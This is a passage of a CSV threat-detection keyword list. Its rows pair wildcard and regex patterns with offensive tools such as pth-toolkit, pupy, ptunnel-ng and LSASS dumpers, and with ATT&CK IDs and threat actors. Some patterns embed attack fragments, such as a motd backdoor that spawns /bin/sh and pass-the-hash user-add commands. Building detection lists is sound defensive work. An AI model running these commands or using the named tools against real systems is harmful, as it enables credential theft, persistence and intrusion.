tool","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","55750" "*pth-net rpc group members *Domain admins*",".{0,1000}pth\-net\srpc\sgroup\smembers\s.{0,1000}Domain\sadmins.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55751" "*pth-net rpc group members *Exchange Servers*",".{0,1000}pth\-net\srpc\sgroup\smembers\s.{0,1000}Exchange\sServers.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55752" "*pth-net rpc password * -U * -S *",".{0,1000}pth\-net\srpc\spassword\s.{0,1000}\s\-U\s.{0,1000}\s\-S\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55753" "*pth-net rpc user add * -U *-S *",".{0,1000}pth\-net\srpc\suser\sadd\s.{0,1000}\s\-U\s.{0,1000}\-S\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55754" "*pth-rpcclient*",".{0,1000}pth\-rpcclient.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' 
systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","55755" "*pth-smbclient*",".{0,1000}pth\-smbclient.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","55756" "*PTHSMBClientDelete*",".{0,1000}PTHSMBClientDelete.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","55757" "*PTHSMBClientGet*",".{0,1000}PTHSMBClientGet.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","55758" "*PTHSMBClientList*",".{0,1000}PTHSMBClientList.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","55759" "*PTHSMBClientPut*",".{0,1000}PTHSMBClientPut.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","55760" "*PTHSMBExec*",".{0,1000}PTHSMBExec.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","55761" "*pth-smbget*",".{0,1000}pth\-smbget.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","55762" "*pth-toolkit*",".{0,1000}pth\-toolkit.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral 
Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","55763" "*pth-toolkit-master.zip*",".{0,1000}pth\-toolkit\-master\.zip.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","55764" "*pth-winexe*",".{0,1000}pth\-winexe.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","55765" "*pth-wmic*",".{0,1000}pth\-wmic.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","55766" "*PTHWMIExec*",".{0,1000}PTHWMIExec.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","55767" "*pth-wmis*",".{0,1000}pth\-wmis.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","55768" "*ptresearch/AttackDetection*",".{0,1000}ptresearch\/AttackDetection.{0,1000}","offensive_tool_keyword","POC","POC exploits - The Attack Detection Team searches for new vulnerabilities and 0-days. reproduces it and creates PoC exploits to understand how these security flaws work and how related attacks can be detected on the network layer. Additionally. we are interested in malware and hackers TTPs. 
so we develop Suricata rules for detecting all sorts of such activities.","T1210 - T1583 - T1586 - T1589 - T1596","TA0002 - TA0011 - TA0007","N/A","N/A","Exploitation tool","https://github.com/ptresearch/AttackDetection","1","1","N/A","N/A","N/A","10","1353","359","2022-08-31T09:26:21Z","2016-03-24T14:42:50Z","55769" "*pts764gt354fder34fsqw45gdfsavadfgsfg.kraskula.com*",".{0,1000}pts764gt354fder34fsqw45gdfsavadfgsfg\.kraskula\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","55770" "*ptunnel-client.log*",".{0,1000}ptunnel\-client\.log.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","#logfile","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55771" "*ptunnel-data-recv*",".{0,1000}ptunnel\-data\-recv.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55772" "*ptunnel-data-send*",".{0,1000}ptunnel\-data\-send.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55773" "*ptunnel-master*",".{0,1000}ptunnel\-master.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - 
TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55774" "*ptunnel-ng *",".{0,1000}ptunnel\-ng\s.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55775" "*ptunnel-ng.conf*",".{0,1000}ptunnel\-ng\.conf.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55776" "*ptunnel-ng.git*",".{0,1000}ptunnel\-ng\.git.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55777" "*ptunnel-ng.service*",".{0,1000}ptunnel\-ng\.service.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55778" "*ptunnel-ng.te*",".{0,1000}ptunnel\-ng\.te.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55779" 
"*ptunnel-ng-x64.exe*",".{0,1000}ptunnel\-ng\-x64\.exe.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55780" "*ptunnel-ng-x64-dbg.exe*",".{0,1000}ptunnel\-ng\-x64\-dbg\.exe.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55781" "*ptunnel-ng-x86.exe*",".{0,1000}ptunnel\-ng\-x86\.exe.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55782" "*ptunnel-ng-x86-dbg.exe*",".{0,1000}ptunnel\-ng\-x86\-dbg\.exe.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55783" "*ptunnel-server.log*",".{0,1000}ptunnel\-server\.log.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","#logfile","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55784" "*pty.spawn(""/bin/sh""* >> 
/etc/update-motd.d/00-header*",".{0,1000}pty\.spawn\(\""\/bin\/sh\"".{0,1000}\s\>\>\s\/etc\/update\-motd\.d\/00\-header.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","55785" "*public class Keylogger*",".{0,1000}public\sclass\sKeylogger.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","55795" "*public class LSASSDump*",".{0,1000}public\sclass\sLSASSDump.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","55796" "*public class NTLMInjector*",".{0,1000}public\sclass\sNTLMInjector.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential 
Access","https://github.com/vletoux/NTLMInjector","1","0","N/A","N/A","10","2","167","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z","55797" "*public class WmEye*",".{0,1000}public\sclass\sWmEye.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","0","N/A","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","55798" "*Public\dcinst.exe*",".{0,1000}Public\\dcinst\.exe.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","55799" "*Public\lsass.dmp*",".{0,1000}Public\\lsass\.dmp.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","55800" "*PublicKeyToken=8337224c9ad9e356*",".{0,1000}PublicKeyToken\=8337224c9ad9e356.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","55801" "*publisher.publish(`TOBROWSER_*",".{0,1000}publisher\.publish\(\`TOBROWSER_.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","#content","on forked repo","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","55802" "*pupwinutils.shellcode*",".{0,1000}pupwinutils\.shellcode.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55809" "*pupy*/checkvm.py*",".{0,1000}pupy.{0,1000}\/checkvm\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 
- T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55810" "*pupy/external/Inveigh*",".{0,1000}pupy\/external\/Inveigh.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55811" "*pupy/external/LaZagne*",".{0,1000}pupy\/external\/LaZagne.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 
- T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55812" "*pupy/external/linux-exploit-suggester*",".{0,1000}pupy\/external\/linux\-exploit\-suggester.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","#linux","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55813" "*pupy/external/mimipy*",".{0,1000}pupy\/external\/mimipy.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting 
Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55814" "*pupy/external/pyopus*",".{0,1000}pupy\/external\/pyopus.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55815" "*pupy/external/pywerview*",".{0,1000}pupy\/external\/pywerview.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55816" 
"*pupy/external/winpty*",".{0,1000}pupy\/external\/winpty.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55817" "*pupy/external/WinPwnage*",".{0,1000}pupy\/external\/WinPwnage.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 